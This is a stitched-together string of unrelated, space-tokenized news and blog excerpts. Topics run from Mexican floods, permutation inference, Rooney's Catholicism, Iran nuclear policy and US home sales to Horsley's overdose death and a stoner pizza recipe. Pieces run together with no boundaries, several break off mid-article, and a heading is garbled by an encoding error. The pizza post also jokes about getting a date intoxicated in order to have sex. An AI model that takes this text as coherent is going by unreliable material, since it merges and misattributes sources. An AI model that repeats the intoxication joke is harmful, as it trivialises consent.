Vista del puente internacional I , a punto de ser inundado por el agua del río Bravo , que ha aumentado su cauce a una altura de 13 metros Gastón Monge
video Graban derrumbe de la presidencia municipal de Linares .
Un video - aficionado captó los momento en que ´ Alex´ derribó la presidencia de Linares en NL ; el edificio fue inaugurado en 1896 , cuenta con un estilo arquitectónico propio del neoclásico inglés
CIUDAD DE M�XICO | Jueves 08 de julio de 2010
Silvia Otero | El Universal
16:24
Permutations arise in a variety of real - world problems , such as voting , ranking , and data association .
Representing uncertainty over permutations , however , is difficult since there are n!
permutations , and unlike many problems , they cannot be represented effectively by graphical models due to the mutual exclusivity constraints typically associated with permutations .
I will present a more effective representation which uses the " low - frequency ' ' terms of a Fourier decomposition to represent distributions over permutations compactly .
For such representations to be truly useful , we need to be able to efficiently do inference , and to this end , I will discuss a set of useful inference operations , including marginalization and conditioning , which work completely in the Fourier domain .
Performing inference on low frequency Fourier - based approximations , can often lead to functions which do not correspond to any valid distribution .
To combat such errors , I will talk about a method for projecting approximations to a relaxed marginal polytope and demonstrate the effectiveness of the approach on a real camera - based multi-person tracking scenario .
Finally , I will talk about approaches for splitting a distribution into independent factors and the inverse problem of merging independent factors to form a joint in the Fourier domain .
I will discuss how the splitting and joining operations can be applied to our ongoing work on " adaptive inference " , where we exploit independence in order to gain speedups for inference .
This is joint work with Carlos Guestrin and Leonidas Guibas .
It was yesterday 's Alastair Campbell moment .
When Wayne Rooney was asked about the prominent cross he has been wearing during training here he replied : " It 's my religion . "
This seemed to open up an interesting new flank in the Rooney story until the Football Association 's head of media relations , Mark Whittle , offered an aside reminiscent of Campbell telling Tony Blair : " We do n't do God . "
Whittle replied for Rooney : " We do n't do religion . "
Rooney , currently an officer of state of Blairite proportions , had already offered enough information to offer an intriguing insight into his Catholicism , though .
Of the cross he said : " I 've been wearing them for years now and you do n't usually watch training [ to see them . ]
I obviously can't wear them in games . "
The timing suggests that his recourse to Catholicism may have had its roots in his search for redemption after the events of Gelsenkirchen in 2006 , though it seems that Rooney 's wife , Coleen , has had more influence than a red card against Portugal .
She comes from a devout Catholic family and her father , Tony , is a particularly devoted , practising Catholic .
Religion has formed a part in Rooney 's own life , though , from the letters " RC " to be found on his birth certificate to an education at Our Lady and St Swithin 's Roman Catholic Primary , a ten - minute walk from his childhood Liverpool home , and his particular success at religious education there .
" Wayne 's recall of stories about the life of Jesus is quite detailed .
His contributions to discussions show him to be a caring child who responds to the needs of others , " read a formative school report .
What does theology have to do with reality ?
Serious question ; if you take the Dawkins view – that theology is the study of a non-existent being – all theological talk is about nothing .
It is n't even nonsense .
Then there is a more generous atheist view , which says that theology is whatever theologians do , so part of it is philosophy , and part , perhaps , is history , or textual criticism .
Christians , of course will have a third take , or a fourth .
Most , in practice , suppose that atheists are half right : theology is airy - fairy stuff that interests theologians , but normal people just get on with worshipping .
Theologians themselves , however , have clear views on what they are doing and how it relates to reality .
So how can we best understand this discipline ?
Monday 's response
Tina Beattie :
To do theology well is to empower people to resist religion 's co-option by the powers of fanaticism and violence
Tuesday 's response
Terry Sanderson :
In the words of Robert A Heinlein , ' Theology ... is searching in a dark cellar at midnight for a black cat that is n't there '
Thursday 's response
Nick Spencer : Theology would be worth studying even if God did not exist for then it would tell us about our deepest selves
Friday 's response
Michael McGhee :
Whatever else they do , the scriptures , like any other literature , reveal the unconscious ambivalences of their writers
To Floyd Landis , one of the mysteries of his time with the U.S. Postal Service cycling team was why more new bikes were n't available for the riders .
He eventually struck on one possible answer : the team was selling equipment to the public to raise cash .
In March 2004 , during an eight - day race from Paris to Nice , Mr. Landis said he was in position to win the sixth stage when his bike frame snapped .
He blamed the mishap on the bike 's carbon frame , which , he said , had been weakened by wear and tear .
After ...
Photo File / MLB
Photos via Getty Images
Teddy Ballgame was also a decorated Marine pilot , renowned fisherman and heckuva nice guy .
July 25 , 1966 : For a speech that lasted less than three minutes , Ted Williams sure knew had to pack a wallop .
Sharing the day with fellow Hall of Fame classmate , beloved manager Casey Stengel , " The Kid " showed displayed true humility and grace with one of the most memorable induction addresses in sports history .
The Red Sox outfielder left the game with a home run shot in his final at - bat in 1960 , his .344 batting average and 521 home runs ( despite nearly five years of military service ) making him a shoo - in for voters .
For all his unease with the press and his lack of championship rings it would have been easy for Williams to betray some bitterness about his career ( something even certain winners have a hard time of doing ) .
Instead , he chose to thank the powers , and people , that gave him the opportunity to play .
As his own act of generosity , he made a plea for the assembly to include other greats who had n't been as fortunate :
" Baseball gives every American boy a chance to excel .
Not just to be as good as anybody else , but to be better .
This is the nature of man and the name of the game ... and I hope someday Satchel Paige and Josh Gibson will be voted into the Hall of Fame as symbols of the great Negro players who are not here only because they were n't given the chance . "
It was the first time a Major League player of Williams ' stature had spoken on behalf his Negro League colleagues .
Satchel Paige was elected to the Baseball Hall of Fame in 1971 .
Josh Gibson followed in 1972 .
Southport World Cup fan builds stadium in garden
Continue reading the main story Related Stories
A football fan on Merseyside has built a 50 - seater stadium in his back garden to watch the World Cup , complete with its own players ' tunnel and burger van .
Tim Marsters has even decked out his makeshift stadium with a bar and turnstiles to make his football viewing more like being at the game .
The 28 - year - old , who lives in Birkdale , has fitted an 8ft by 4ft ( 2.4 m by 1.2 m ) projector screen by the pitch .
" We were a full house for the England v USA game , all bums on seats , " he said .
The loft converter , who runs his own business , employed three of his friends to help build the stadium , which they completed in a week .
' Bit quirky '
" It 's just for my family and friends , they really love it , I have my little cousins , nieces and nephews over and they get to play on the pitch before the game starts .
" Then we all get settled in and ready for the kick - off .
We even use a special sunscreen if it is too bright to maximise the viewing potential . "
The seats and the stand are covered in England flags and he has even painted the pitch markings on his garden .
" It 's not a money - making venture , of course I do n't charge people to come and watch but it is just for family and friends .
" I do n't want people trying to come in who do n't even know us but just want to sit somewhere a bit quirky - it 's not about that . "
by | |
This morning ’s Washington Post features an op -ed on Iran policy by former U.S. Senator Charles ( Chuck ) Robb and retired U.S. Air Force general Charles ( Chuck ) Wald .
It ’s a serious , earnest statement , but also seriously flawed .
The gist of what The Two Chucks have to say is this : we cannot “ compel Iran to terminate its nuclear program ” unless we threaten to bomb it .
Only if we do threaten to bomb it — in addition to imposing sanctions and holding the door open to diplomacy — will we have any real hope of success .
This shift to a “ triple - track strategy ” must be made swiftly , because Iran “ could achieve nuclear weapons capability before the end of this year . ”
Call it the “ Say it with JDAMs “ school of nonproliferation diplomacy .
Unfortunately , it overlooks a couple of the key puzzle pieces needed to understand the situation .
**
First and most importantly , you can bomb an enrichment facility , but you ca n’t bomb an enrichment program .
( Or not one as well - developed as Iran’s . )
It ’s not like a reactor , with billions of dollars ’ worth of hard - to - replace capital piled up in one spot over the course of several years .
Instead , it ’s thousands of interchangeable pieces that can be brought together and operated more or less anywhere .
To illustrate the point , here ’s an interior view from Iran ’s centrifuge facility at Natanz :
Any one of those centrifuges — the tall , silvery tubes in the picture — and the piping connecting them can be replaced in short order .
What ’s more , the entire complex could be buried in wreckage , and the centrifuge workshops would simply start sending their products to a different location .
Bomb the workshops — if you are lucky enough to locate them — and new workshops could be set up before very long .
Following this line of reasoning leads you to a realization that Iran ’s capacity for precision engineering would have to be bombed somehow .
That ’s not a problem with a solution .
**
Second , Robb and Wald are mistaken about when Iran will achieve “ nuclear weapons capability . ”
The Iranians could start producing highly - enriched uranium for bombs before you go to bed tonight .
They could have started years ago , in fact .
That they have not done so , as far as anyone knows , renders the art and science of timeline - ology , as Robb and Wald are practicing it , more or less moot .
( It helps to recall that the timelines sometimes discussed by representatives of the Intelligence Community reflect features such as how much time it takes to set up a new clandestine facility like the one at Qom , as opposed to anything special happening at the big showpiece facility at Natanz . )
**
Perhaps you ’re wondering :
So if we ca n’t bomb their enrichment program , why have n’t the Iranians already started making bomb material ?
What ’s holding them in check ?
One possibility is , maybe they ’ve decided they do n’t want to , or feel they do n’t need to .
A second possibility is , they think the price of forging ahead would be too high .
The sanctions are bad enough as it is .
A third and related possibility is that they think that the price might involve not just the bombing of an enrichment facility here or an air defense system there , but a much more comprehensive sort of attack , one that would threaten the regime ’s grip on power .
Here is where we might start a different sort of conversation about the utility of threats .
As Tom Schelling pointed out some decades ago , threats are much more useful for trying to deter action than for trying to compel action .
After all , if Iran were to withdraw from the Non-Proliferation Treaty ( NPT ) or kick out inspectors , then they would have crossed a line , not the other side .
It is much easier to justify the use of force in response to a grave provocation than in terms of a technological timeline generated with a spreadsheet somewhere , and subject to a variety of assumptions .
In the meantime , certain advantages accrue to the United States and its allies from not dropping JDAMs .
One is that the international community can continue to monitor Iran ’s nuclear programs , albeit not as well as it should .
To start bombing would probably mean losing that access , since the Iranians would probably respond by leaving the NPT and rebuilding their centrifuge facilities in secret somewhere .
In short , the real Iran “ nuclear timeline ” has to do with leadership decision - making more than technical milestones .
Bombing might well accelerate that timeline , not slow it .
New home sales plummet to record low
NEW YORK ( CNNMoney.com ) --
New home sales plummeted to a record low in May , the first month following the expiration of the homebuyer tax credit .
This snapped a two - month streak of gains .
New home sales declined 32.7 % to a seasonally adjusted annual rate of 300,000 last month , down from an downwardly revised 446,000 in April , the Commerce Department reported Wednesday .
Sales year - over - year fell 18.3 % .
This is the slowest sales pace since the Commerce Department began tracking data in 1963 .
The prior record was set in September 1981 , when new homes sold at an annual rate of 338,000 .
" We expected a slowdown , but the extent of this decline was a surprise , " said Anika Khan , an economist at Wells Fargo .
The figure was even worse than her relatively pessimistic forecast of an annual rate of 380,000 in May .
A consensus of economists surveyed by Briefing.com had expected May sales to slide to an annual rate of 430,000 .
" Clearly , the lack of a tax credit had a lot to do with it , and it 's going to be a bit of a bumpy road ahead as we get a few more months of payback , " Khan said .
Home sales had surged in March and April as homebuyers scrambled to sign contracts ahead of the April 30 deadline for the tax credit .
First - time homebuyers qualified for a tax credit up to $ 8,000 , while repeat buyers could get as much as a $ 6,500 break .
Homebuyers have until June 30 to close deals , but the Senate may vote to push that deadline back to Sept. 30 .
Khan expects home sales to remain depressed through the third quarter as home construction continues to contract and lending standards remain tight .
But , she said , sales should pick up slightly in the fourth quarter .
Although , she added , we are still years away from a normal level of new home sales -- an annual rate between 800,000 and 900,000 .
" A full housing recovery is contingent on employment , " Khan said .
" When we see the unemployment rate abate , and some growth in salaries and incomes , we 'll get some sustainable momentum in the housing market . "
A real estate industry report released earlier this week showed that existing home sales , based closed sales rather than signed contracts , slipped slightly last month but remained elevated .
Price and inventory :
The government report showed that the median price of new homes sold in May was $ 200,900 , down less than 1 % from April but a 9.6 % drop from May 2009 .
An estimated 213,000 new homes were for sale at the end of May , the lowest inventory level in more than 40 years .
Still , at the current sales pace , the government expects it will take 8.5 months to sell through that inventory , up from 5.8 months in April .
Six months of inventory is considered normal market conditions .
Sales by region : Sales fell the most in the West , where they decreased by more than 50 % ; the Northwest saw sales declined by about a third .
Sales in the South and Midwest declined by about 25 % .
Image caption Pavlos Joseph said he met David Beckham in England 's dressing room
The fan who burst into the England dressing room at the World Cup says he was looking for a toilet .
Pavlos Joseph told the Sunday Mirror he accidentally stumbled across the England players in Cape Town 's Green Point stadium .
The incident took place following the team 's 0 - 0 draw with Algeria on Friday .
Mr Joseph said he told David Beckham England fans had spent " a lot of money " to travel to South Africa and that the team 's performance was " a disgrace " .
Mr Joseph , a 32 - year - old mortgage advisor from south - east London , said he had been waiting outside the stadium for his two cousins and their father , after the game .
After half an hour he decided to find a toilet , and said he was pointed in the direction of the players ' tunnel by a steward .
While wandering about the tunnel , he said , he suddenly found himself in the England dressing room .
I said ' My name 's Pavlos and I 'm just looking for a toilet '
Pavlos Joseph
He said : " David Beckham was directly in front of me .
I noticed him in his grey suit .
I wanted to make the most of this opportunity to tell him how frustrated us , his fans , are .
" I said to him ' David , we 've spent a lot of money coming out here .
That was a disgrace and what are you going to do about it ?'
" He looked at me in surprise and stunned .
He did n't know what to say .
" As he was about to say ' Who are you ? ' one of the Fifa officials came towards me and asked me that question .
All the players were looking at each other and looking at myself .
" I said ' My name 's Pavlos and I 'm just looking for a toilet . ' "
' No guards '
Mr Joseph said the Fifa official took him to the nearest toilet , which was in the main building of the ground in the public area , and that the two later exchanged business cards .
" I said to him ' That atmosphere in the dressing room was shocking ' .
And he said to me ' You should have been in there at half - time , ' Mr Joseph added .
" No security guards at any point ... had questioned me , stopped me or even attempted to arrest me . "
David Beckham had earlier said the fan he spoke to " did n't comment on the performance , he walked in , said hello " .
The former England captain , who is with the squad despite missing the tournament through injury , said : " The actual fan literally just walked in very casually and just said something to me and then walked out - there was no scuffle , there was no aggression at all . "
Macro Beliefs and Reality By Arnold Kling
I am leaning toward a view of macroeconomics in which firms , households , and government face a collision between beliefs and reality .
Beliefs tend to be formed out of habitual observation .
If certain types of investments in human and physical capital have paid off in recent years , then keep making those sorts of investments .
A problem arises when beliefs tend to be self - fulfilling for a while , but turn out to be unsustainable .
The obvious example I have in mind is house prices and mortgage lending in the U.S. before the crisis .
As long as everyone believed house prices would continue to rise , lending became easier , more people bought houses , and house prices in fact rose .
These beliefs became more and more out of touch with long - term reality , and so the adjustment to reality was harsh .
Probably my favorite Scott Sumner post is the one where he offered what I called a cyclical monetary theory , meaning that monetary theory is itself cyclical .
In good times , people are monetarists .
They believe that the Fed is all - powerful and can always produce great economic outcomes .
When a crash hits , people become Austrians , believing that the previous prosperity was false and that now we must pay the price .
When the bad times have been around for a while , people become Keynesians , convinced that government must be able to do something but that monetary policy has been tried and does not work .
I would note that this time around , many people are coming around to the view that fiscal policy has been tried and does not work .
I think that my least favorite Sumnerian proposition is that the Fed can affect the economy by announcing a long - term target for a nominal variable .
I think that in order for this to work , you have to assume that people are forward - looking and focused on future monetary policy .
On the other hand , his mechanism by which monetary policy works is the conventional story in which nominal wages are sticky , so that with higher aggregate demand you get lower real wages and more real output .
But for nominal wages to be sticky , workers cannot be forward - looking and focused on monetary policy .
So , on the one hand , for targets to matter , people have to be forward - looking .
On the other hand , for monetary policy to matter , people cannot be forward - looking .
I cannot past what I see as a basic contradiction .
For what it ’s worth , in case you cannot tell already , I do not think that people are forward - looking .
I think that they are habit - driven and backward - looking .
Because I believe that people are habit - driven and backward - looking , I think it is possible for real wages to fluctuate .
However , I do not think that real wage movements have been very important in post - war economic fluctuations .
I do not think of the prosperity we experienced a few years ago as inherently false .
It happened to be false because it relied on unsustainable beliefs .
If we had not had a housing bubble , I think it is possible that instead firms and households could have created patterns of specialization and trade that resulted in full employment and affluence that were more sustainable .
Ultimately , I think that the Recalculation will result in such new patterns of specialization and trade .
As it is , a lot of people ’s plans have been disrupted by the collision between prior habits and reality .
I do not think that there is much that government can do about it .
Extending unemployment benefits , stimulating road construction , or giving money to state governments to maintain high levels of compensation for public employees will not do anything that I can see to establish new patterns of trade and specialization .
I do not see open market operations by the central bank as doing anything to establish new patterns of trade and specialization .
The empirical basis for the belief that government can do something about output and employment is quite thin .
If you really want to believe that , say , fiscal policy works , you can focus on those examples where it appeared to work ( say , military spending in World War II and the Kennedy tax cut in the early 1960 ’s ) and try to explain away all the examples where it appeared to fail ( which is pretty much every other time and place that it has been tried ) .
My father used to say that the First Iron Law of social science is , “ Sometimes it ’s this way , and sometimes it ’s that way . ”
My reading of the record on fiscal and monetary policy is that it follows the First Iron Law .
Sometimes , we see economic improvement when fiscal expansions are attempted .
Sometimes we do n’t .
The same with monetary policy expansions .
I think it is reasonable to read history as saying that economic outcomes are pretty much orthogonal to macroeconomic policy moves , which is a fancy way of saying that the economy does what it does without regard to fiscal and monetary policy .
What does a pizza delivery teen , a taxi driver and a courier have to do with EVs ?
Not much right now , but could these and other professional drivers hold the key to truly prove that EVs have what it takes to hit the big time , or do they risk condemning EVs to the history books forever ?
Chinese auto firm BYD ( Build Your Dreams ) is known for its larger - than life attitude to EVs .
Initially a battery firm , it has branched out into cars and plans to bring its e6 all electric car to the USA in the next few years .
The e6 does n't stand out .
It is a normal - looking car from a small company with a big appetite to catch up with the likes of GM , Nissan and Tesla .
What does stand out however is the way in which BYD are proving their E6 ready to take on the world ; by running a fleet of electric e6 taxis in Shenzhen .
While BYD is n't the only firm to have electric taxi test fleets , it is aiming to produce the largest .
By the end of 2010 it is estimated that there will be 100 brightly colored e6 taxis operating in and around Shenzhen , all running on electricity .
Schemes elsewhere in the world , noticeably London , consist of much smaller test fleets made up of electric Mercedes Vitos and a smaller number of electric " London Cabs " .
In the U.S.A , there are similarly small test fleets of electric vehicles working as taxis .
Someone has even turned a Tesla Roadster into a Taxi , but we assume more as a gimick than an actual practical taxi .
Giving taxi drivers and other professional drivers electric vehicles is the ultimate in field - testing for any electric car maker .
Most professionally driven fleet vehicles are in almost constant use , spending many hours in operation over a wide range of traffic and speeds .
For electric cars , an arduous fleet life poses one particular question .
What about recharging .
Recharging time for a conventional electric vehicle in a conventional setting is the time when its driver is asleep .
In an average , everyday setting a car like the 2011 Nissan Leaf are unlikely to be driven beyond its 100 mile range in a day .
When the owner returns home at the end of a busy day the car will happily top - up charge overnight , ready for a fresh new day of driving .
Mercedes - Benz E- Vito taxi , adapted to electric drive by consortium of British companies
A taxi could cover 100 miles before lunch .
Unless it has a huge battery pack it needs to be able to reliably and quickly recharge -- something BYD are trialling with one - hour fast charge stations for the e6 Taxis .
Conventional Taxis , Pizza delivery and courier vehicles are often driven around - the - clock , by two or three separate drivers .
There is no down time , no recharge time and only scheduled maintenance slots .
Any time not spent on the road costs either the driver or the company money .
And that affects the prices to the consumers .
If BYD 's experiment of long - term placement of electric e6 taxis in Shenzhen succeeds after the equivalent of decades worth of driving in a year then BYD will have proven its car ready to take on the normal benign world of commuting and family life .
24 Hour RPG guidelines
I seem to be getting good responses from my post over on the RPG .
net forums abut how to develop a 24 hour RPG .
So I 'll repost the outline here .
Set your 24 hour goal as mid-day to mid-day ( you 'd probably want a weekend for this ) .
12 pm - 2 pm : Get your ideas down on scrap paper .
What 's your game about ?
What mechanisms do you need to make sure you game is really about that topic ?
What is the setting ?
Is it different from other settings ?
How ?
Why are you writing this game ?
I like to divide my scraps into ...
" Setting " - pretty self explanatory .
It might only take a few lines , it might be a quick page , or it might be developed by the players as they play .
Make sure you note this down .
" Character Generation " -
What stats or traits do you need ?
Why do you need them ?
How will the be important to the game ?
How do you generate them ?
Do you have pre-made templates or classes ?
" Session Start " - What starts the game happening ?
Do you start with a simply blurb read out to the player to set the scene , or do you let the players choices set their story 's starting point ?
" Game Play " - Consider the game mechanisms you need to tell the story you want .
Do you need combat mechanisms ?
Do you want rules for social intrigue ?
Relationships between characters ?
Do the rules change under specific circumstances ( stress , injury , loss of face ) ?
" Session End " - What are the character working toward ?
How do they know once they 've reached it ?
" Joining Stories together " - Are you interested in campaign play for this game ?
How do characters evolve ?
2 pm - 4 pm : Go over your notes .
Are any parts of the game obviously missing ?
If this is deliberate , make sure to add a new note to explain why you 've specifically avoided certain aspects of the game design .
If this is n't deliberate , make a conscious effort to fill in your gaps ... use rules from existing games to fill in the pieces if the inspiration does n't hit right away .
While you 're doing this , make sure that the various parts of your game make sense compared to one another ... do you roll high in this section but roll low in that section ... if so , why ?
Gradually start to pull your pieces together into a coherent document .
4 pm - 6 pm : Write up a draft set of rules ; do n't worry about formatting , just get the rules down .
This is n't a time for writing up new rules , it 's just the time when you get your game 's framework in place .
6 pm - 8 pm : Eat .
Take some time away from your project .
Watch a TV show , surf some forums , take your mind off it a bit .
Then read through your draft set of rules and compare them to your scrap - page ideas .
8 pm - 10 pm : Solo Playtest .
Generate up a character using the rules you 've written , do it on a scrap of paper .
Did the character generation make sense ?
If not , get a red pen and make editing notes to your " Character Generation " page .
Generate a completely different style of character , re-edit the generation system as necessary ( 24 hour games are quick and tend to be " rules - lite " it should only take a couple of minutes to create a character ) .
Once you 're happy , you 'll have a bunch of characters ready for the next stage of the process .
Run through a typical scene in the game .
Pit two of your characters against one another in various situations using the die rolls ( or other mechanisms ) you 've written on the " Game Play " scrap sheet .
Do the rolls make sense ?
If not , make some changes .
10 pm - 12 pm : Perspective .
Did you find when creating the characters that certain things took more time than others ?
Did you find that the areas focused on in character generation were also focused on during your play simulations ?
Were there certain traits that you really did n't use at all ?
If you see any problems here , now is the time to make some extra changes to the " Character Generation " and " Game Play " sheets .
If you are n't using an attribute or trait , why do you have it ?
If it 's just used to derive another stat , why not just work with the other stat ?
Do you think combat happens too fast , or too slow ?
What about social interactions ?
Maybe this is the whole point of the game .
Do you still think that quirky dice mechanism from the beginning is useful ?
What do you think this adds to the game now that you 've played through a couple of sample scenes with it ?
Make some notes on your various sheets of scrap paper about this .
12 pm - 6 am : Sleep .
Do n't underestimate this one .
You 'll probably have some good ideas still running through your head , and you might not get a full night 's sleep while the adrenaline is pumping and the ideas are firing away wildly .
But make sure you get some good rest so you can come back to the project with a fresh perspective .
6 am - 8 am : Get some breakfast , then get to work .
Using the framework document you wrote up the previous evening , rewrite anything according to the changes specified in your edited notes .
If you 've had some epiphanies during your night of sleep , add them into your updated file .
8 am - 10 am : Retest .
With a new version of the rules written up , generate a new pair of characters .
If the rules still work in the morning , then you 've probably got a solid idea in place .
Start to generate a proper character sheet by placing character traits in specific locations on the page .
If you generate a couple of characters , make sure to lay them out in different ways .
After you 've come up with a few ideas for character sheet layout , one should strike you as better than the others ( if not , just pick one that you like ) .
With a new batch of characters play through a couple of scenes again , and even try stringing a few scenes together to see how they work as a part of a larger whole .
If you 've got access to a room - mate or partner , play a scene or two with them and get their feedback .
If something is causing problems , consider adding a couple of " Play examples " to your text .
Do n't make major changes to your game at this point , but consider them for later and add them as new editing notes on your scrap pages .
10 am - 12 am : Formatting .
Generate up a proper character sheet .
Go over your game text for spelling errors and grammatical errors .
Start at the beginning and work your way through .
This is n't the time for making changes to your game mechanisms , it 's just about getting your current ideas into a good readable format .
Include section headings for " Setting " , " Character Generation " , " Rules " and anything else that strikes you as important for the game .
Pick a font that suits the ideas in the game , especially for your section titles .
If you 've got some pre-made images that served as inspiration during the process , add them into your file at strategic points ( a combat scene , place it near the combat rules ... a cool character shot , place it in the character generation section ) .
Give the text one last read through , save it or print it out as a pdf using CutePDF ( or something similar ) .
That 's it .
Your document could end up as a single sheet of paper or it might be up to a dozen pages long ( 2 pages per section ) , I certainly would n't recommend longer than this .
The 24 hour RPG challenge is all about getting good ideas out of your head and placing them into a context where others can play with them .
Minutes after seeing an actor play him on stage this week in an adaptation of his no-holds - barred autobiography , Sebastian Horsley said : " They say seeing your doppelganger is an omen of death , so I got quite excited about that and thought , best get my coat on . "
The extent to which the 47 - year - old artist 's unabashedly dissolute life imitated his art appeared to have reached a tragic zenith at 11 am yesterday , when he was found dead by a girlfriend from a suspected heroin overdose in his flat in London 's Soho , the corner of the capital whose seediness he sought to epitomise and whose gentrification he openly lamented .
His comment to The Independent two days ago at the review night of Dandy In the Underworld , the well - received play based on his memoir of the same name , reinforced speculation among friends that the opening of the production at the Soho Theatre was a significant factor in his death .
After seeing the play , Horsley said : " I 'd rather be crucified again than sit through that .
I knew I was obnoxious but I never knew how much . "
Scotland Yard yesterday said that it was treating the death as " non-suspicious at this early stage " .
It is understood that drugs paraphernalia were found near his body in the flat on Meard Street in the heart of Soho , where Horsley slept with many of the " more than 1,000 " prostitutes he claimed to have spent time with at an accumulated cost of £ 100,000 .
Habitually describing himself as a " dandy " , Horsley had built a career out of his louche existence and his toe - curlingly frank writing about his dysfunctional family , addiction to heroin and crack cocaine , and penchant for paid - for sex .
Ivan Massow , the entrepreneur and former chairman of the Institute of Contemporary Arts , paid tribute to a " great friend " .
Mr Massow said : " He was your archetypal dandy , who loved people to think the worst of him .
He was another larger - than - life Soho figure and it is sad that we are losing these last beacons of insanity . "
The elder son of Nicholas Horsley , a lifelong Labour Party member who oversaw the transformation of Northern Foods into one of Britain 's largest food companies as its chairman , Sebastian found himself on the fringes of the YBA ( Young British Artists ) movement and pursued extreme methods in his work .
His " artist as art " approach reached its height in August 2000 when he travelled to the Philippines to take part in a ritual where supplicants recreate the crucifixion .
After refusing painkillers , he was nailed to the cross through his hands and feet before passing out .
The extraordinary experiment in what Horsley called " method painting " ended when the footrest on the cross broke and he fell off , ripping through the flesh on his hands .
A film and photographs of the gruesome event , along with the artist 's subsequent paintings , were the basis for an exhibition in London in 2002 .
Talking then about the experience , Horsley said : " As an artist I do n't want to paint things as they are but the way I feel and sense they are .
I can only feel and sense how they are by undergoing the experience . "
The artist claimed to have funded his existence through a fortune made on the stock market during the 1980s .
Describing his attitude to his wealth , Horsley said he had " invested 90 per cent of my money in prostitutes , the rest on Class A drugs , the remains I squandered " .
The writer , who once described himself as " half - Byronic , half - moronic ; part - shaman , part - showman ; half - Nazi , half - Liberace " , attributed his passion for baring his backside to convention to his upbringing by alcoholic parents , who married after knowing each other for 13 days .
His mother , Valerie , said in an interview shortly before her death : " I do n't think Nicholas ever went to bed sober and I was always in a fog .
Sebastian and my two other children were accidents and I drank all the way through my pregnancies .
I tried not to be drunk when the kids came home from school . "
In his autobiography , Horsley wrote of his family : " [ My father ] did n't give a toss about me .
And I hated him .
But I hated Stepfather even more .
He was a tosspot .
I 'd come home to find him in bed with Mother , and Father in bed with someone else .
Clearly everyone in my life who should have been vertical was horizontal . "
Friends of Horsley , who was said to have been clean from drugs in recent months , last night insisted he was not filled with self - loathing and was unlikely to have taken his life .
Toby Young , the journalist , said he initially believed the renowned flaneur might have faked his death in order to publicise the play of his memoir .
Mr Young told the Daily Telegraph : " I have no doubt his death was an accident ...
If it had been suicide Sebastian would not have passed up the opportunity to write a note .
It 's a tragic loss of life . "
The Soho Theatre cancelled last night 's performance of the one - man show as a mark of respect but said the production would continue as a tribute to its subject .
Tim Fountain , the writer and director of the play , said there was a gulf between the public persona projected by Horsley and the private man .
He said : " The real man was one of the sweetest , kindest , funniest people I ever had the privilege of meeting .
But as Sebastian himself always said , he was hard - wired for extremes , and extreme ways of living bring with them great risks as well as rewards .
I 'm devastated . "
Horsley missed few opportunities to further his reputation as a dilettante , writing a sex column for The Observer newspaper which was withdrawn after four months following complaints from readers about its graphic Easter Day descriptions of anal sex and revelling in an incident in March 2008 when he was denied entry to the United States on the basis he had dabbled in " moral turpitude " .
The artist , who said he had worked briefly as a male prostitute and brothel keeper , had grown increasingly unhappy at what he saw as the decline of Soho as a centre of loose morals and bohemian bars , bemoaning the closure of haunts such as the Colony Room .
Speaking last week following the death of the Colony Room 's last proprietor , Michael Wojas , Horsley told The Independent : " Ten years ago , on a good night here , you could get your throat cut .
The air used to be clean and the sex used to be dirty .
Now it is the other way round .
Posted May 20 , 2010 by Cheeb Dweeb in Uncategorized .
Tagged : cannabis , Dinner , food for stoners , food stoners like , marijuana , munchies , pot , snacks , stoner , stoner food , stoner snacks , stoner 's cookbook , weed .
Leave a Comment
This recipe is a good one for couples , and it might even make for a good cheap date if you play your cards right and buy some red wine to go with it .
Just be certain that the wine is in a bottle and not in a box or a jug , and you drink it from wine glasses and not mason jars or coffee mugs .
If you do n’t have wine glasses , go to Goodwill or Value Village and buy two ( three if you are clumsy ) .
I digress .
To be honest , making this pizza cost a bit more than calling Dominoes , but is less expensive than pizza from a pizza parlor .
You ’ll save yourself a lot of trouble ( and potentially a lot of heart ache ) if you just buy a pre-made crust .
Buy one like the Boboli crusts that are pre-cooked .
Do n’t buy an uncooked one because you ’ll probably fuck it up .
Most of the pre-made crust are kind of spendy , maybe $ 7.50 for two ( but they come with sauce ) .
I know what you ’re thinking .
“ Fuck that shit !
For $ 7.50 , I could just buy a pizza from Dominoes . ”
I ’m not saying you ’re wrong , I ’m just saying that if you buy a pizza from Dominoes you ’re not getting laid tonight .
If you do n’t want to get laid tonight , call Dominoes now .
If you do want to get laid , keep reading .
To make this pizza , you are going to need to secure the following items :
Boboli or other pre-cooked pizza crust : Boboli also make personal sized pizzas , so if you wanted you could each make your own personal pizza .
Cheese :
You can buy pre-shredded cheese if you like , but I think that pre-shredded cheese taste like shit .
Instead I like to buy a small brick of each type of cheese I want on my pizza and grate it myself .
The cheese taste much fresher this way , and it keeps pretty well in the block form if you store it properly , so you can use it again later .
On my pizza , I like to use mozzarella ( I buy Cheese Head string cheese for this because it is more fun to snack on ) , Tillamook pepper jack cheese , and Tillamook sharp cheddar .
Sauteed garlic clove , or garlic paste : Both are cheap and last for ever , buy both if you want .
Butter or olive oil .
Jumbo Olives :
Do n’t buy pre-sliced , slice your own and save the rest for later .
Red or white onion , or both .
Green Pepper :
You wo n’t need all of it , so freeze the rest .
Jalapeno :
If you like spicy food .
Pepperoni : Spring for the more expensive option .
Sauce : Unless you bought a Boboli crust , those come with sauce .
Italian sausage :
You ’ll have to fry it yourself , but it is worth it .
This one is optional .
Before you get started , you ’ll need to get the following items together from your kitchen ( or the dollar store ) :
Cookie sheet Aluminum foil Cheese grater Paring knife Spoon Butter knife Paper towels
Follow these steps to make the pizza :
Preheat the oven to 450 degrees Fahrenheit .
DO NOT FORGET TO DO THIS !
Pour a couple of glasses of wine Rock paper scissors for who grates cheese and who slices veggies .
Better yet , you do it and let you date watch .
Grate Cheese .
Slice up your veggies and store the extras .
I like to slice everything small and spread it evenly , I think the pizza eats better this way Cover your cookie sheet with aluminum foil .
Remove crust from package and place on cookie sheet .
Butter or oil your crust and add garlic .
You can just oil the edges if you want .
Add sauce .
Add your cheese in an even layer over the sauce .
Place your pepperoni over the cheese , do n’t get too carried away unless you want to make a real gut bomb .
Throw a little more cheese on top .
Evenly distribute your veggies over the pepperoni and cheese .
Place in oven and bake for 11 - 13 minutes .
Enjoy .
You should lights some candles and turn the lights off while you eat .
With any luck your date or significant other will be swept of their feet and intoxicated enough to get down to business a little later on .
A progressive foreign policy will require more focus on Islamic radicalism .
The following is adapted from a talk delivered at the U.S. State Department in Washington , D.C. , on March 19 , 2010 .
One of the greatest ironies of the past decade 's debates over political Islam has been that , on the whole , the most passionate and emphatic rejections of radical Islamism in this country came from President Bush and his supporters — that is , conservatives .
